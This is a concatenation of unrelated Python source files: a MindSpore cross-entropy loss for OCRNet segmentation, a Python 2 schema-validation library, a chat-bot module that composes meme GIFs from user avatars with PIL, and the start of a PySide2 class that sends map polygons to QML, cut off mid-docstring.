                1.0166, 0.9969, 0.9754, 1.0489,
                0.8786, 1.0023, 0.9539, 0.9843,
                1.1116, 0.9037, 1.0865, 1.0955,
                1.0865, 1.1529, 1.0507]
class CrossEntropyWithLogits(LossBase):
    """
    Cross-entropy loss function for semantic segmentation,
    and different classes have the same weight.

    The logits are resized to `image_size`, the label map is flattened,
    pixels equal to `ignore_label` are masked out, and the mean loss over
    the remaining pixels is returned.
    """
    def __init__(self, num_classes=19, ignore_label=255, image_size=None):
        super(CrossEntropyWithLogits, self).__init__()
        # logits are resized to image_size before comparing with the labels
        self.resize = F.ResizeBilinear(image_size)
        self.one_hot = P.OneHot(axis=-1)
        self.on_value = Tensor(1.0, mstype.float32)
        self.off_value = Tensor(0.0, mstype.float32)
        self.cast = P.Cast()
        self.ce = nn.SoftmaxCrossEntropyWithLogits()
        self.not_equal = P.NotEqual()
        self.num_classes = num_classes
        self.ignore_label = ignore_label
        self.mul = P.Mul()
        self.argmax = P.Argmax(output_type=mstype.int32)
        self.sum = P.ReduceSum(False)
        self.div = P.RealDiv()
        self.transpose = P.Transpose()
        self.reshape = P.Reshape()
    def construct(self, logits, labels):
        """Loss construction."""
        logits = self.resize(logits)
        labels_int = self.cast(labels, mstype.int32)
        labels_int = self.reshape(labels_int, (-1,))
        # NCHW -> NHWC, then flatten to (num_pixels, num_classes)
        logits_ = self.transpose(logits, (0, 2, 3, 1))
        logits_ = self.reshape(logits_, (-1, self.num_classes))
        # 1.0 for valid pixels, 0.0 for ignored ones
        weights = self.not_equal(labels_int, self.ignore_label)
        weights = self.cast(weights, mstype.float32)
        one_hot_labels = self.one_hot(labels_int, self.num_classes, self.on_value, self.off_value)
        loss = self.ce(logits_, one_hot_labels)
        loss = self.mul(weights, loss)
        # average over the valid (non-ignored) pixels only
        loss = self.div(self.sum(loss), self.sum(weights))
        return loss
class CrossEntropyWithLogitsAndWeights(LossBase):
    """
    Cross-entropy loss function for semantic segmentation,
    and different classes have different weights.

    The per-pixel weight is looked up in the module-level `weights_list`
    by class index; pixels matching no class (e.g. `ignore_label`) keep a
    zero weight and therefore do not contribute to the loss.
    `image_size` is accepted for interface parity with
    CrossEntropyWithLogits but is unused here.
    """
    def __init__(self, num_classes=19, ignore_label=255, image_size=None):
        super(CrossEntropyWithLogitsAndWeights, self).__init__()
        self.one_hot = P.OneHot(axis=-1)
        self.on_value = Tensor(1.0, mstype.float32)
        self.off_value = Tensor(0.0, mstype.float32)
        self.cast = P.Cast()
        self.ce = nn.SoftmaxCrossEntropyWithLogits()
        self.zeros = F.Zeros()
        self.fill = F.Fill()
        self.equal = F.Equal()
        self.select = F.Select()
        self.num_classes = num_classes
        self.ignore_label = ignore_label
        self.mul = P.Mul()
        self.argmax = P.Argmax(output_type=mstype.int32)
        self.sum = P.ReduceSum(False)
        self.div = P.RealDiv()
        self.transpose = P.Transpose()
        self.reshape = P.Reshape()
    def construct(self, logits, labels):
        """Loss construction."""
        labels_int = self.cast(labels, mstype.int32)
        labels_int = self.reshape(labels_int, (-1,))
        # NCHW -> NHWC, then flatten to (num_pixels, num_classes)
        logits_ = self.transpose(logits, (0, 2, 3, 1))
        logits_ = self.reshape(logits_, (-1, self.num_classes))
        labels_float = self.cast(labels_int, mstype.float32)
        # build the per-pixel weight map: weights_list[c] where the pixel's
        # class equals c, 0.0 everywhere else (including ignore_label)
        weights = self.zeros(labels_float.shape, mstype.float32)
        for i in range(self.num_classes):
            fill_weight = self.fill(mstype.float32, labels_float.shape, weights_list[i])
            equal_ = self.equal(labels_float, i)
            weights = self.select(equal_, fill_weight, weights)
        one_hot_labels = self.one_hot(labels_int, self.num_classes, self.on_value, self.off_value)
        loss = self.ce(logits_, one_hot_labels)
        loss = self.mul(weights, loss)
        # weighted average over the contributing pixels
        loss = self.div(self.sum(loss), self.sum(weights))
        return loss
class CrossEntropy(nn.Cell):
    """Loss for OCRNet Specifically.

    Wraps CrossEntropyWithLogitsAndWeights and combines the losses of the
    model's multiple outputs using the balance weights from the config.
    """
    def __init__(self, num_classes=19, ignore_label=-1):
        super(CrossEntropy, self).__init__()
        self.ignore_label = ignore_label
        self.criterion = CrossEntropyWithLogitsAndWeights(num_classes=num_classes, ignore_label=ignore_label)
        self.sum = P.ReduceSum()
        # one balance weight per model output
        self.weights = config.loss.balance_weights
        self.num_outputs = config.model.num_outputs
        self.align_corners = config.model.align_corners
        self.resize_bilinear = nn.ResizeBilinear()
        self.concat = P.Concat()
    def _forward(self, score, target):
        # resize the prediction to the target resolution when they differ
        ph, pw = score.shape[2], score.shape[3]
        h, w = target.shape[1], target.shape[2]
        if ph != h or pw != w:
            score = self.resize_bilinear(score, size=(h, w), align_corners=self.align_corners)
        loss = self.criterion(score, target)
        return loss
    def construct(self, score, target):
        # a single-output model yields one tensor; wrap it for uniformity
        if self.num_outputs == 1:
            score = [score]
        res = []
        # one weighted loss term per model output
        for w, x in zip(self.weights, score):
            res.append(w * self._forward(x, target))
        result = 0
        for ele in res:
            result += ele
        return result
|
<gh_stars>1-10
"""
dictator
~~~~~~~~
Structured data validation library.
:copyright: (c) 2015 by <NAME>.
:license: BSD, see LICENSE.txt for more details.
"""
import string
import datetime
import collections
from functools import wraps
from itertools import imap, izip, chain
__all__ = ('Boolean', 'String', 'Integer', 'Date', 'Datetime',
'Sequence', 'SimpleMapping', 'DeclaredMapping', 'Mapping',
'one_of', 'get_errors')
class ImmutableDict(dict):
    """A hashable, read-only dict.

    The hash is based on the frozenset of items and cached after the
    first call; every mutating method raises TypeError.
    """
    # cached hash value (computed lazily on first __hash__ call)
    _hash = None
    def __hash__(self):
        if self._hash is None:
            self._hash = hash(frozenset(self.items()))
        return self._hash
    def _immutable(self, *args, **kwargs):
        # BUG FIX: accept any arguments so the intended message is raised
        # even for mutators called with arguments (d[k] = v, d.pop(k), ...);
        # the original signature took only `self` and raised a confusing
        # "takes exactly 1 argument" TypeError instead.
        raise TypeError("{} object is immutable"
                        .format(self.__class__.__name__))
    __delitem__ = __setitem__ = _immutable
    clear = pop = popitem = setdefault = update = _immutable
def N_(string):
    """No-op translation marker: return *string* unchanged.

    Wrapping a literal in N_() lets gettext-style tooling collect it
    for later translation without translating at call time.
    """
    return string
def _generative(func):
"""Decorator, which wraps method to call it in the context
of the copied class to provide methods chaining and immutability
for the original class."""
@wraps(func)
def wrapper(cls, *args, **kwargs):
if not hasattr(cls, '__subclassed__'):
# subclass
cls = type(cls.__name__, (cls,), {'__subclassed__': True})
else:
# copy
cls = type(cls.__name__, cls.__bases__, dict(cls.__dict__))
func(cls, *args, **kwargs)
return cls
return wrapper
def _accepts(*types):
"""Verifies incoming value type."""
def decorator(func):
@wraps(func)
def wrapper(self, data):
if not isinstance(data, types):
self.note_error(N_(u'Invalid type'))
else:
return func(self, data)
return wrapper
return decorator
def _empty_check(func):
"""Checks for empty values."""
@wraps(func)
def wrapper(self, data):
if not data.strip():
if self.optional:
pass
else:
self.note_error(N_(u'Empty value'))
else:
return func(self, data)
return wrapper
def _handle_empty(func):
"""Handles `None` values, they are serialized as empty values."""
@wraps(func)
def wrapper(self):
return func(self) if self.state is not None else u''
return wrapper
# Module-private sentinel: distinguishes "key absent" from "value is None".
_undefined = object()
class Base(object):
    """Common machinery of every schema element.

    Instantiating a subclass with raw data runs `__deserialize__` (in
    `__new__`) and then `__validate__` (in `__init__`).  Alternate
    constructors: `with_value` (from a pythonic value, no validation)
    and `without_value` (empty, optionally already marked invalid).
    """
    #: validator functions attached via `expect`.
    __expect__ = ()
    #: name of the element, if it is a part of the mapping.
    name = None
    #: internal value representation.
    state = None
    #: `True` if deserialization and validation was successful,
    #: `False` if there was any kind of error, `None` if element
    #: was instantiated in other way. See also `with_value` and
    #: `without_value` methods.
    valid = None
    #: list of deserialization and validation errors.
    errors = ()
    def __deserialize__(self, data):
        """To deserialize string values into pythonic types."""
        raise NotImplementedError
    def __serialize__(self):
        """To serialize pythonic types into string values."""
        raise NotImplementedError
    def __import__(self, value):
        """To initialize `dictator` schema instance from pythonic
        data structure."""
        raise NotImplementedError
    def __export__(self):
        """To export `dictator` schema instance as pythonic data
        structure."""
        raise NotImplementedError
    def __validate__(self):
        value = self.__export__()
        if value is not None:
            self.valid = True # this can be changed later by validators
            for validator in self.__expect__:
                validator(self)
    def __new__(cls, data):
        # deserialization happens in __new__ so that the alternate
        # constructors can bypass it with a plain object.__new__
        self = object.__new__(cls)
        self.__deserialize__(data)
        return self
    def __init__(self, data):
        self.__validate__()
    @property
    def value(self):
        """Returns deserialized and validated pythonic data structure,
        represented by this schema type."""
        return self.__export__()
    @property
    def data(self):
        """Returns data structure, with scalar values serialized to
        strings."""
        return self.__serialize__()
    @classmethod
    def with_value(cls, value):
        """Initializes schema type with pythonic value, without
        running deserialization and validation."""
        self = object.__new__(cls)
        self.__import__(value)
        return self
    @classmethod
    def without_value(cls, errors=None):
        """Initializes schema type without value, as empty.
        Optionally list of errors can be provided, this will also
        mark this schema instance as non valid."""
        self = object.__new__(cls)
        # explicit loop instead of `map` for side effects: clearer, and
        # stays correct on Python 3 where `map` is lazy
        for error in errors or ():
            self.note_error(error)
        return self
    def note_error(self, error):
        """Adds error for this element."""
        self.errors += (error,)
        self.valid = False
    @classmethod
    @_generative
    def named(cls, name):
        """Returns named schema type."""
        cls.name = name
    @classmethod
    @_generative
    def using(cls, **options):
        """Returns schema type with modified options, provided
        using keyword arguments."""
        for name, value in options.iteritems():
            setattr(cls, name, value)
    @classmethod
    @_generative
    def expect(cls, *validators):
        """Returns schema type with specified value validating
        functions."""
        cls.__expect__ = validators
class Scalar(Base):
    """Base for single-value elements (strings, numbers, dates...).

    Adds an `apply` hook: value modification functions that run after
    deserialization (done in `__new__`) and before validation.
    """
    #: value modification functions attached via `apply`.
    __apply__ = ()
    #: option, when `True`, this type will be able to receive
    #: empty value.
    optional = False
    @classmethod
    @_generative
    def apply(cls, *functions):
        """Returns schema type with specified in arguments value
        modification functions. They are called after deserialization
        and before validation."""
        cls.__apply__ = functions
    def __init__(self, data):
        # __deserialize__ already ran in __new__; pipe the resulting value
        # through the modifiers, then let Base.__init__ run validation
        value = self.__export__()
        if value is not None:
            for function in self.__apply__:
                value = function(value)
            self.__import__(value)
        super(Scalar, self).__init__(data)
    def __export__(self):
        return self.state
    def __import__(self, value):
        self.state = value
class Boolean(Scalar):
    """Deserializes boolean type.
    `True` values: "1", "true", "True", "t" or "on".
    `False` values: "0", "false", "False", "f" or "off".
    """
    @_accepts(unicode)
    @_empty_check
    def __deserialize__(self, data):
        truthy = (u'1', u'true', u'True', u't', u'on')
        falsy = (u'0', u'false', u'False', u'f', u'off')
        if data in truthy:
            self.state = True
        elif data in falsy:
            self.state = False
        else:
            # anything outside both literal sets is rejected
            self.note_error(N_(u'Invalid value'))
    @_handle_empty
    def __serialize__(self):
        # any truthy state serializes as u'true', mirroring deserialization
        return u'true' if self.state else u'false'
class String(Scalar):
    """Deserializes string type.
    NOTE: it contains one default value modifier: `strip` function.
    """
    # default modifier: strips surrounding whitespace (py2 `string.strip`)
    __apply__ = (string.strip,)
    @_accepts(unicode)
    @_empty_check
    def __deserialize__(self, data):
        self.state = data
    @_handle_empty
    def __serialize__(self):
        return unicode(self.state)
class Integer(Scalar):
    """Deserializes integer type."""
    @_accepts(unicode)
    @_empty_check
    def __deserialize__(self, data):
        # non-numeric input is recorded as an error; state stays None
        try:
            self.state = int(data)
        except ValueError:
            self.note_error(N_(u'Invalid value'))
    @_handle_empty
    def __serialize__(self):
        return unicode(self.state)
class Date(Scalar):
    """Deserializes dates into `datetime.date` type."""
    #: option, provides format for date parsing and formatting.
    date_format = '%Y-%m-%d'
    @_accepts(unicode)
    @_empty_check
    def __deserialize__(self, data):
        try:
            # parse as datetime first, then keep only the date part
            dt = datetime.datetime.strptime(data, self.date_format)
            self.state = dt.date()
        except ValueError:
            self.note_error(N_(u'Invalid value'))
    @_handle_empty
    def __serialize__(self):
        return unicode(self.state.strftime(self.date_format))
class Datetime(Scalar):
    """Deserializes date/time into `datetime.datetime` type."""
    #: option, provides format for date/time parsing and formatting.
    datetime_format = '%Y-%m-%dT%H:%M:%S'
    @_accepts(unicode)
    @_empty_check
    def __deserialize__(self, data):
        # unparsable input is recorded as an error; state stays None
        try:
            self.state = datetime.datetime.strptime(data, self.datetime_format)
        except ValueError:
            self.note_error(N_(u'Invalid value'))
    @_handle_empty
    def __serialize__(self):
        return unicode(self.state.strftime(self.datetime_format))
class Container(Base):
    """Base for composite elements (sequences and mappings).

    Concrete containers override `of` to declare their item/value types
    and `__getitem__` to expose their children.
    """
    @classmethod
    @_generative
    def of(cls, *args, **kwargs):
        raise NotImplementedError
    def __getitem__(self, key):
        raise NotImplementedError
class Sequence(Container):
    """Represents sequence of items.
    By default it represents a sequence of strings.
    """
    #: schema type used for every item; configured via `of`.
    __value_type__ = String
    state = ()
    @classmethod
    @_generative
    def of(cls, value_type):
        """Returns `Sequence` schema type with specified item type."""
        cls.__value_type__ = value_type
    def __validate__(self):
        super(Sequence, self).__validate__()
        # valid only when the sequence itself and every item are valid
        items_iterator = chain(self.state, [self])
        self.valid = all(item.valid for item in items_iterator)
    def __export__(self):
        return [item.__export__() for item in self.state]
    def __import__(self, value):
        self.state = tuple(imap(self.__value_type__.with_value, value))
    @_accepts(collections.Sequence)
    def __deserialize__(self, data):
        self.state = tuple(imap(self.__value_type__, data))
    def __serialize__(self):
        return [item.__serialize__() for item in self.state]
    def __getitem__(self, index):
        return self.state[index]
class SimpleMapping(Container):
    """Represents mapping of strings to values.
    By default it represents a mapping of strings to strings.
    """
    #: schema type used for every value; configured via `of`.
    __value_type__ = String
    state = ImmutableDict()
    @classmethod
    @_generative
    def of(cls, value_type):
        """Returns `SimpleMapping` schema type with specified value type."""
        cls.__value_type__ = value_type
    def __validate__(self):
        super(SimpleMapping, self).__validate__()
        # valid only when the mapping itself and every value are valid
        items_iterator = chain(self.state.itervalues(), [self])
        self.valid = all(item.valid for item in items_iterator)
    def __export__(self):
        return {k: v.__export__() for k, v in self.state.iteritems()}
    def __import__(self, value):
        # `or ([], [])` covers the empty mapping (py2 zip() returns [])
        keys, values = zip(*value.iteritems()) or ([], [])
        values_iterator = imap(self.__value_type__.with_value, values)
        self.state = ImmutableDict(izip(keys, values_iterator))
    @_accepts(collections.Mapping)
    def __deserialize__(self, data):
        keys, values_data = zip(*data.iteritems()) or ([], [])
        values_iterator = imap(self.__value_type__, values_data)
        self.state = ImmutableDict(izip(keys, values_iterator))
    def __serialize__(self):
        return {k: v.__serialize__() for k, v in self.state.iteritems()}
    def __getitem__(self, key):
        return self.state[key]
class DeclaredMapping(Container):
    """Represents mapping with predefined keys and value types.

    Each declared value type carries its key in its `name` attribute.
    The `missing` / `unknown` options control whether absent or extra
    keys in the input are treated as errors.
    """
    #: declared (named) value types; configured via `of`.
    __value_types__ = ()
    state = ImmutableDict()
    #: option, when `False`, which is by default, any missing key
    #: will flag an error.
    missing = False
    #: option, when `False`, which is by default, any unknown key
    #: will flag an error.
    unknown = False
    @classmethod
    @_generative
    def of(cls, *value_types):
        """Returns `DeclaredMapping` with specified named value types."""
        cls.__value_types__ = tuple(value_types)
    def __validate__(self):
        super(DeclaredMapping, self).__validate__()
        # `is not False` keeps empty (valid=None) children from failing
        items_iterator = chain(self.state.itervalues(), [self])
        self.valid = all(item.valid is not False for item in items_iterator)
    def __import__(self, value):
        state = {}
        for value_type in self.__value_types__:
            item_value = value.get(value_type.name, None)
            if item_value is None:
                state[value_type.name] = value_type.without_value()
            else:
                state[value_type.name] = value_type.with_value(item_value)
        self.state = ImmutableDict(state)
    def __export__(self):
        return {k: v.__export__() for k, v in self.state.iteritems()}
    @_accepts(collections.Mapping)
    def __deserialize__(self, data):
        defined_keys = set(t.name for t in self.__value_types__)
        provided_keys = set(data.iterkeys())
        missing_keys = defined_keys - provided_keys
        if missing_keys and not self.missing:
            self.note_error(N_(u'Missing keys'))
        unknown_keys = provided_keys - defined_keys
        if unknown_keys and not self.unknown:
            self.note_error(N_(u'Unknown keys'))
        state = {}
        for value_type in self.__value_types__:
            # sentinel distinguishes an absent key from an explicit None
            value_data = data.get(value_type.name, _undefined)
            if value_data is _undefined:
                errors = () if self.missing else (N_(u'Missing value'),)
                state[value_type.name] = value_type.without_value(errors)
            else:
                state[value_type.name] = value_type(value_data)
        self.state = ImmutableDict(state)
    def __serialize__(self):
        return {k: v.__serialize__() for k, v in self.state.iteritems()}
    def __getitem__(self, key):
        return self.state[key]
class Mapping(Container):
    """Works like a factory for `SimpleMapping` and `DeclaredMapping`."""
    @classmethod
    def of(cls, *value_types):
        """Returns `SimpleMapping` or `DeclaredMapping` depending on
        provided value types.
        If there is only one type provided and it does not have a name,
        then `SimpleMapping` will be returned, otherwise
        `DeclaredMapping` will be returned.
        """
        single_anonymous = len(value_types) == 1 and not value_types[0].name
        if single_anonymous:
            return SimpleMapping.of(value_types[0])
        return DeclaredMapping.of(*value_types)
def one_of(values):
    """Validator factory: flag 'Wrong choice' unless the element's value
    belongs to *values*."""
    allowed = frozenset(values)
    def one_of_checker(el):
        if el.value not in allowed:
            el.note_error(N_(u'Wrong choice'))
    return one_of_checker
def get_errors(schema):
    """Walks through the schema instance to collect all errors.

    Returns a nested dict mirroring the schema: each node carries its own
    'errors' tuple, and containers additionally carry 'items' (a list for
    sequences, a dict for mappings) with the errors of their children.
    """
    if isinstance(schema, Container):
        # sequences keep their items in a tuple, mappings in a dict
        if isinstance(schema.state, tuple):
            return {'errors': schema.errors,
                    'items': map(get_errors, schema.state)}
        elif isinstance(schema.state, dict):
            keys, values = zip(*schema.state.iteritems())
            values = imap(get_errors, values)
            return {'errors': schema.errors,
                    'items': dict(izip(keys, values))}
        else:
            raise TypeError('Unknown collection type: %r' % type(schema))
    else:
        # scalar element: only its own errors
        return {'errors': schema.errors}
|
<reponame>umimori13/mai-bot
import random
import imageio
from io import BytesIO
from typing import List, Tuple
from PIL.Image import Image as IMG
from PIL import Image, ImageDraw, ImageFilter
from .download import get_resource
def resize(img: IMG, size: Tuple[int, int]) -> IMG:
    """Return *img* scaled to *size* with high-quality Lanczos resampling.

    `Image.ANTIALIAS` was an alias of LANCZOS and was removed in
    Pillow 10; `Image.LANCZOS` behaves identically on old and new
    Pillow versions.
    """
    return img.resize(size, Image.LANCZOS)
def rotate(img: IMG, angle: int, expand: bool = True) -> IMG:
    """Return *img* rotated counter-clockwise by *angle* degrees using
    bicubic resampling; *expand* grows the canvas to fit the result."""
    return img.rotate(angle, resample=Image.BICUBIC, expand=expand)
def circle(img: IMG) -> IMG:
    """Cut *img* to a circle by installing an elliptical alpha mask
    (modifies and returns the same image object)."""
    width, height = img.size
    mask = Image.new('L', (width, height), 0)
    ImageDraw.Draw(mask).ellipse((0, 0, width, height), fill=255)
    # radius-0 blur is effectively a no-op; kept for parity with the
    # original code (raise the radius for softer edges)
    mask = mask.filter(ImageFilter.GaussianBlur(0))
    img.putalpha(mask)
    return img
def square(img: IMG) -> IMG:
    """Return the centered square crop of *img* (side = min dimension).

    Uses integer coordinates: the original passed a float box that
    Pillow merely truncates, so explicit floor division selects exactly
    the same pixels while being unambiguous.
    """
    width, height = img.size
    length = min(width, height)
    left = (width - length) // 2
    top = (height - length) // 2
    return img.crop((left, top, left + length, top + length))
def save_gif(frames: List[IMG], duration: float) -> BytesIO:
    """Encode *frames* as an animated GIF (frame delay *duration*, in
    seconds) and return the encoded bytes in a BytesIO buffer."""
    buffer = BytesIO()
    imageio.mimsave(buffer, frames, format='gif', duration=duration)
    return buffer
def to_jpg(frame: IMG, bg_color=(255, 255, 255)) -> IMG:
    """Flatten *frame* to an RGB image suitable for JPEG output.

    RGBA input is composited over *bg_color* using its alpha channel;
    any other mode is simply converted to RGB.
    """
    if frame.mode != 'RGBA':
        return frame.convert('RGB')
    alpha = frame.split()[3]
    background = Image.new('RGB', frame.size, bg_color)
    background.paste(frame, mask=alpha)
    return background
def save_jpg(frame: IMG) -> BytesIO:
    """Encode *frame* as JPEG and return the bytes in a BytesIO buffer."""
    buffer = BytesIO()
    frame.convert('RGB').save(buffer, format='jpeg')
    return buffer
def load_image(data: bytes, convert: bool = True) -> IMG:
    """Decode raw image *data*; when *convert* is set, also flatten it,
    crop it square and switch to RGBA (the canonical input format used
    by the GIF generators below)."""
    image = Image.open(BytesIO(data))
    if not convert:
        return image
    return square(to_jpg(image).convert('RGBA'))
async def load_resource(path: str, name: str) -> IMG:
    """Fetch the resource *name* under *path* and decode it as RGBA."""
    image = await get_resource(path, name)
    return Image.open(BytesIO(image)).convert('RGBA')
async def petpet(img: IMG, *args) -> BytesIO:
    """Build the 5-frame "petpet" GIF: a hand patting the avatar *img*."""
    frames = []
    # per-frame paste box of the avatar: (x, y, width, height)
    locs = [(14, 20, 98, 98), (12, 33, 101, 85), (8, 40, 110, 76),
            (10, 33, 102, 84), (12, 20, 98, 98)]
    for i in range(5):
        frame = Image.new('RGBA', (112, 112), (255, 255, 255, 0))
        x, y, w, h = locs[i]
        # NOTE(review): Image.ANTIALIAS was removed in Pillow 10 -- this
        # call needs Image.LANCZOS on newer Pillow; confirm pinned version
        frame.paste(img.resize((w, h), Image.ANTIALIAS), (x, y))
        hand = await load_resource('petpet', f'{i}.png')
        frame.paste(hand, mask=hand)
        frames.append(frame)
    return save_gif(frames, 0.06)
async def kiss(self_img: IMG, user_img: IMG, *args) -> BytesIO:
    """Generate the 'kiss' GIF pasting both avatars onto 13 base frames."""
    # Per-frame (x, y) positions for each avatar.
    user_locs = [(58, 90), (62, 95), (42, 100), (50, 100), (56, 100), (18, 120), (28, 110),
                 (54, 100), (46, 100), (60, 100), (35, 115), (20, 120), (40, 96)]
    self_locs = [(92, 64), (135, 40), (84, 105), (80, 110), (155, 82), (60, 96), (50, 80),
                 (98, 55), (35, 65), (38, 100), (70, 80), (84, 65), (75, 65)]
    frames = []
    for i in range(13):
        frame = await load_resource('kiss', f'{i}.png')
        # Round both avatars; the target's head is drawn slightly larger.
        user_head = resize(circle(user_img), (50, 50))
        frame.paste(user_head, user_locs[i], mask=user_head)
        self_head = resize(circle(self_img), (40, 40))
        frame.paste(self_head, self_locs[i], mask=self_head)
        frames.append(frame)
    return save_gif(frames, 0.05)
async def rub(self_img: IMG, user_img: IMG, *args) -> BytesIO:
    """Generate the 'rub' GIF pasting both avatars onto 6 base frames."""
    # (x, y, width, height) for the target avatar per frame.
    user_locs = [(39, 91, 75, 75), (49, 101, 75, 75), (67, 98, 75, 75),
                 (55, 86, 75, 75), (61, 109, 75, 75), (65, 101, 75, 75)]
    # (x, y, width, height, rotation-angle) for the sender avatar per frame.
    self_locs = [(102, 95, 70, 80, 0), (108, 60, 50, 100, 0), (97, 18, 65, 95, 0),
                 (65, 5, 75, 75, -20), (95, 57, 100, 55, -70), (109, 107, 65, 75, 0)]
    frames = []
    for i in range(6):
        frame = await load_resource('rub', f'{i}.png')
        x, y, w, h = user_locs[i]
        user_head = resize(circle(user_img), (w, h))
        frame.paste(user_head, (x, y), mask=user_head)
        x, y, w, h, angle = self_locs[i]
        self_head = rotate(resize(circle(self_img), (w, h)), angle)
        frame.paste(self_head, (x, y), mask=self_head)
        frames.append(frame)
    return save_gif(frames, 0.05)
async def play(img: IMG, *args) -> BytesIO:
    """Generate the 'play with it' GIF for *img*."""
    # Avatar placement (x, y, width, height) for the first 18 frames;
    # the remaining raw frames (18-22) contain no avatar.
    locs = [(180, 60, 100, 100), (184, 75, 100, 100), (183, 98, 100, 100),
            (179, 118, 110, 100), (156, 194, 150, 48), (178, 136, 122, 69),
            (175, 66, 122, 85), (170, 42, 130, 96), (175, 34, 118, 95),
            (179, 35, 110, 93), (180, 54, 102, 93), (183, 58, 97, 92),
            (174, 35, 120, 94), (179, 35, 109, 93), (181, 54, 101, 92),
            (182, 59, 98, 92), (183, 71, 90, 96), (180, 131, 92, 101)]
    raw_frames = []
    for i in range(23):
        raw_frame = await load_resource('play', f'{i}.png')
        raw_frames.append(raw_frame)
    img_frames = []
    for i in range(len(locs)):
        frame = Image.new('RGBA', (480, 400), (255, 255, 255, 0))
        x, y, w, h = locs[i]
        frame.paste(resize(img, (w, h)), (x, y))
        raw_frame = raw_frames[i]
        frame.paste(raw_frame, mask=raw_frame)
        img_frames.append(frame)
    # Final sequence: the opening segment loops twice, then the closing
    # segment and the avatar-free raw frames play once.
    frames = []
    for i in range(2):
        frames.extend(img_frames[0:12])
    frames.extend(img_frames[0:8])
    frames.extend(img_frames[12:18])
    frames.extend(raw_frames[18:23])
    return save_gif(frames, 0.06)
async def pat(img: IMG, *args) -> BytesIO:
    """Generate the 'pat' GIF for *img*."""
    # Two alternative avatar placements; the second is used only on
    # sprite 2 to match the hand position.
    locs = [(11, 73, 106, 100), (8, 79, 112, 96)]
    img_frames = []
    for i in range(10):
        frame = Image.new('RGBA', (235, 196), (255, 255, 255, 0))
        x, y, w, h = locs[1] if i == 2 else locs[0]
        frame.paste(resize(img, (w, h)), (x, y))
        raw_frame = await load_resource('pat', f'{i}.png')
        frame.paste(raw_frame, mask=raw_frame)
        img_frames.append(frame)
    # Playback order of the 10 composed sprites.
    seq = [0, 1, 2, 3, 1, 2, 3, 0, 1, 2, 3, 0, 0, 1, 2, 3,
           0, 0, 0, 0, 4, 5, 5, 5, 6, 7, 8, 9]
    frames = [img_frames[n] for n in seq]
    return save_gif(frames, 0.085)
async def rip(img: IMG, *args) -> BytesIO:
    """Generate the 'rip in half' still image for *img*."""
    rip = await load_resource('rip', '0.png')
    frame = Image.new('RGBA', rip.size, (255, 255, 255, 0))
    # Two tilted copies of the avatar form the torn halves; the overlay
    # sprite is pasted on top to hide the seam.
    left = rotate(resize(img, (385, 385)), 24)
    right = rotate(resize(img, (385, 385)), -11)
    frame.paste(left, (-5, 355))
    frame.paste(right, (649, 310))
    frame.paste(rip, mask=rip)
    return save_jpg(frame)
async def throw(img: IMG, *args) -> BytesIO:
    """Generate the 'throw' still image for *img*.

    The avatar is rounded and given a random rotation so repeated calls
    produce visually different results.
    """
    img = resize(rotate(circle(img), random.randint(1, 360),
                        expand=False), (143, 143))
    frame = await load_resource('throw', '0.png')
    frame.paste(img, (15, 178), mask=img)
    return save_jpg(frame)
async def crawl(img: IMG, *args) -> BytesIO:
    """Generate the 'crawl' still image for *img*.

    One of 92 background frames is picked at random.
    """
    img = resize(circle(img), (100, 100))
    frame = await load_resource('crawl', '{:02d}.jpg'.format(random.randint(1, 92)))
    frame.paste(img, (0, 400), mask=img)
    return save_jpg(frame)
async def support(img: IMG, *args) -> BytesIO:
    """Generate the 'support' still image for *img*."""
    support = await load_resource('support', '0.png')
    frame = Image.new('RGBA', support.size, (255, 255, 255, 0))
    # Tilt the enlarged avatar behind the overlay sprite.
    img = rotate(resize(img, (815, 815)), 23)
    frame.paste(img, (-172, -17))
    frame.paste(support, mask=support)
    return save_jpg(frame)
async def always(img: IMG, *args) -> BytesIO:
    """Generate the 'always' meme: *img* large on top, small below the text.

    Animated inputs keep their animation: every source frame is composed
    and re-encoded as a GIF with the source's frame duration.
    """
    always = await load_resource('always', '0.png')
    w, h = img.size
    # Heights of the scaled copies at widths 249 (top) and 47 (inline).
    h1 = int(h / w * 249)
    h2 = int(h / w * 47)
    height = h1 + h2 + 5
    def paste(img: IMG) -> IMG:
        # Compose one output frame: overlay sprite, then both scaled copies.
        img = to_jpg(img)
        frame = Image.new('RGBA', (249, height), (255, 255, 255, 0))
        frame.paste(always, (0, h1 - 249 + int((h2 - 47) / 2)))
        frame.paste(resize(img, (249, h1)), (0, 0))
        frame.paste(resize(img, (47, h2)), (140, h1 + 2))
        return frame
    if not getattr(img, 'is_animated', False):
        return save_jpg(paste(img))
    else:
        frames = []
        for i in range(img.n_frames):
            img.seek(i)
            frames.append(paste(img))
        return save_gif(frames, img.info['duration'] / 1000)
|
<filename>src/qt_classes.py
"""Defines classes to be used with Qt."""
import config
from path_finding.mission_planner import MissionPlanner
from PySide2.QtCore import Property
from PySide2.QtCore import QAbstractListModel
from PySide2.QtCore import QModelIndex
from PySide2.QtCore import QObject
from PySide2.QtCore import Signal
from PySide2.QtCore import Slot
from PySide2.QtPositioning import QGeoCoordinate
from PySide2.QtPositioning import QGeoPolygon
from shapely.geometry.point import Point
class PolygonGenerator(QObject):
    """A generator which can be used to send polygons to QML."""
    def __init__(self, data_source_method):
        """
        Create the generator and construct the QObject.
        Args:
        - data_source_method: Function to call for retrieving
            raw polygon data (must return QGeoPolygon)
        """
        QObject.__init__(self)
        self.get_polygon_data = data_source_method
    # Emitted whenever a polygon should be (re)drawn by the QML view.
    polygonChanged = Signal(QGeoPolygon)
    @Slot(QGeoPolygon)
    def __add_polygon(self, poly: QGeoPolygon):
        """Add a polygon to the QML view.
        Args:
        - poly: Which polygon we ought to add.
        """
        self.__poly = poly
        self.polygonChanged.emit(self.__poly)
    @Slot(result=QGeoPolygon)
    def get_polygon(self):
        """Gets the currently selected polygon.

        NOTE(review): ``self.__poly`` is only assigned by ``__add_polygon``,
        so calling this before any polygon was added raises AttributeError —
        confirm the QML side always adds a polygon first.
        """
        return self.__poly
    @Slot()
    def fetchPolygon(self):
        """QML accessible function which displays the polygons on the map."""
        polygons = self.get_polygon_data()
        # Side-effect-only comprehension: emits one change signal per polygon.
        [self.polygonChanged.emit(pol) for pol in polygons]
    # Expose the current polygon to QML, backed by get_polygon.
    poly = Property(QGeoPolygon, get_polygon, notify=polygonChanged)
class DebugPolygonGenerator(PolygonGenerator):
    """
    A generator which can be used to send polygons to QML.
    Allows for relaying position data from inside of QML.
    """
    @Slot(float, float)
    def fetchPolygon(self, latitude: float, longitude: float):
        """
        QML accessible function which displays the polygons on the map.
        Args:
        - latitude: Latitude of the point to construct the
            fence polygon around
